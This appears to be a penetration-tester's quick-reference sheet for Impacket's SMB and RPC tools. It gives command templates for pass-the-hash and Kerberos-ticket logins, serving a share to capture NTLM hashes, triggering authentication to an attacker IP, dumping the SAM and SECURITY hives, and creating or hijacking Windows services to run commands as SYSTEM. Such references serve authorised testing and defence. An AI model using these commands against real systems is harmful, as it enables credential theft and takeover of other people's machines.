Impacket β SMB and RPC
Quick Reference
| Tool | Purpose |
|---|---|
smbclient.py |
SMB mini-shell β browse shares, upload, download |
smbserver.py |
Serve a local directory as an SMB share |
rpcdump.py |
Enumerate RPC endpoints via epmapper |
reg.py |
Remote Windows registry manipulation |
services.py |
Remote Windows service management |
smbclient.py
SMB client mini-shell for interacting with shares β browse, upload, download files.
Syntax:
smbclient.py [options] <domain>/<username>:<password>@<target>
Common Usage:
# Interactive shell (password)
smbclient.py <domain>/<username>:<password>@<target>
# Pass-the-Hash
smbclient.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Kerberos (ccache)
KRB5CCNAME=<ticket> smbclient.py -k -no-pass <domain>/<username>@<target>
# AES key
smbclient.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>
# Specify target IP (when hostname can't resolve)
smbclient.py -target-ip <target> <domain>/<username>:<password>@<target>
# Run commands from input file non-interactively
smbclient.py -inputfile commands.txt <domain>/<username>:<password>@<target>
# Log all actions to file
smbclient.py -outputfile <output> <domain>/<username>:<password>@<target>
Shell Commands (once connected):
shares β list available shares
use <share> β connect to share
ls [path] β list directory
cd <path> β change directory
get <file> β download file
put <file> β upload file
mkdir <dir> β create directory
rm <file> β delete file
cat <file> β print file contents
info β server info
logoff β logoff
exit / quit β exit
Options:
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -target-ip <target> β Target IP override
- -port <port> β Destination SMB port
- -inputfile <file> β Commands file for non-interactive use
- -outputfile <file> β Log output to file
smbserver.py
Serve a local directory as an SMB share β useful for file transfers, relay captures, or triggering NTLM auth.
Syntax:
smbserver.py [options] <shareName> <sharePath>
Common Usage:
# Serve /tmp as share named TMP (unauthenticated)
smbserver.py TMP /tmp
# Serve with SMB2 support
smbserver.py -smb2support TMP /tmp
# Serve with authentication required
smbserver.py -smb2support -username <username> -password <password> <share> /local/path
# Capture NTLM hashes (no auth required, just serve and capture)
smbserver.py -smb2support SHARE /tmp
# Listen on specific interface
smbserver.py -ip <target> -smb2support TMP /tmp
# Listen on non-default port
smbserver.py -port 4445 -smb2support TMP /tmp
# Output logs to file
smbserver.py -outputfile /tmp/smb.log TMP /tmp
# Drop SSP (capture NTLMv1 instead of NTLMv2)
smbserver.py -dropssp TMP /tmp
# IPv6
smbserver.py -6 -smb2support TMP /tmp
Options:
- <shareName> β Name of the share (positional, required)
- <sharePath> β Local path to serve (positional, required)
- -comment <text> β Share comment
- -username <username> β Require this username for auth
- -password <password> β Password for auth
- -hashes <lm-hash>:<nt-hash> β NTLM hashes for auth
- -ip <ip> / --interface-address <ip> β Bind address
- -port <port> β Listen port (default 445)
- -smb2support β Enable SMB2
- -dropssp β Disable NTLM ESS/SSP (force NTLMv1)
- -6 / --ipv6 β Listen on IPv6
- -outputfile <file> β Log to file
Trigger NTLM auth from Windows target:
# UNC path access from target triggers NTLM capture
dir \\<attacker-ip>\SHARE
net use \\<attacker-ip>\SHARE
rpcdump.py
Enumerate RPC endpoints on a target via the endpoint mapper β lists all registered interfaces and their transport bindings.
Syntax:
rpcdump.py [options] <domain>/<username>:<password>@<target>
Common Usage:
# Dump all RPC endpoints (password)
rpcdump.py <domain>/<username>:<password>@<target>
# Pass-the-Hash
rpcdump.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Unauthenticated (null session)
rpcdump.py <target>
# Specify target IP
rpcdump.py -target-ip <target> <domain>/<username>:<password>@<target>
# Custom port
rpcdump.py -port 135 <domain>/<username>:<password>@<target>
Options:
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -target-ip <target> β Target IP override
- -port <port> β Destination port for RPC endpoint mapper
Notes:
- Useful for identifying exposed RPC services (TSCH, ICPR, LSA, etc.)
- Look for MS-RPRN (print spooler β SpoolSS coerce), MS-EFSR (PetitPotam), MS-FSRVP
reg.py
Remote Windows registry manipulation β query, add, delete, save, and backup registry keys.
Syntax:
reg.py [options] <domain>/<username>:<password>@<target> {query|add|delete|save|backup} ...
Common Usage:
# Query a registry key
reg.py <domain>/<username>:<password>@<target> query \
-keyName "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
# Query specific value
reg.py <domain>/<username>:<password>@<target> query \
-keyName "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" \
-v RequireSecuritySignature
# Add a registry value
reg.py <domain>/<username>:<password>@<target> add \
-keyName "HKLM\SOFTWARE\TestKey" -v TestValue -vt REG_SZ -vd "hello"
# Delete a value
reg.py <domain>/<username>:<password>@<target> delete \
-keyName "HKLM\SOFTWARE\TestKey" -v TestValue
# Save hive to remote path
reg.py <domain>/<username>:<password>@<target> save \
-keyName "HKLM\SAM" -o SAM.save
# Backup SAM + SYSTEM + SECURITY (credential dumping prep)
reg.py <domain>/<username>:<password>@<target> backup -o /tmp/backup
# Pass-the-Hash
reg.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target> query \
-keyName "HKLM\SAM"
# Kerberos (ccache)
KRB5CCNAME=<ticket> reg.py -k -no-pass <domain>/<username>@<target> query \
-keyName "HKLM\SOFTWARE"
Options:
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -target-ip <target> β Target IP override
- -port <port> β Destination port
Actions:
- query β List subkeys and values under a key
- add β Add a subkey or value
- delete β Delete a subkey or value
- save β Save a hive to a file on the remote target
- backup β Special: save SAM, SYSTEM, and SECURITY hives
services.py
Remote Windows service management β list, create, start, stop, delete, configure services.
Syntax:
services.py [options] <domain>/<username>:<password>@<target> {list|create|start|stop|delete|status|config|change} ...
Common Usage:
# List all services
services.py <domain>/<username>:<password>@<target> list
# Get service status
services.py <domain>/<username>:<password>@<target> status -name <service-name>
# Get service config
services.py <domain>/<username>:<password>@<target> config -name <service-name>
# Start a service
services.py <domain>/<username>:<password>@<target> start -name <service-name>
# Stop a service
services.py <domain>/<username>:<password>@<target> stop -name <service-name>
# Create a service (persistence / command execution)
services.py <domain>/<username>:<password>@<target> create \
-name <service-name> -display <service-name> \
-path "C:\Windows\System32\cmd.exe /c <command>"
# Delete a service
services.py <domain>/<username>:<password>@<target> delete -name <service-name>
# Change service binary path (hijack)
services.py <domain>/<username>:<password>@<target> change \
-name <service-name> -path "C:\Windows\Temp\evil.exe"
# Pass-the-Hash
services.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target> list
# Kerberos (ccache)
KRB5CCNAME=<ticket> services.py -k -no-pass <domain>/<username>@<target> list
Options:
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -target-ip <target> β Target IP override
- -port <port> β Destination port
Actions:
- list β List all services
- status β Get service status
- config β Get service configuration
- create β Create a new service
- start β Start a service
- stop β Stop a service
- delete β Delete a service
- change β Modify a service configuration
Notes:
- Creating a service with a malicious binary path and starting it runs the command as SYSTEM
- Always clean up (stop + delete) after use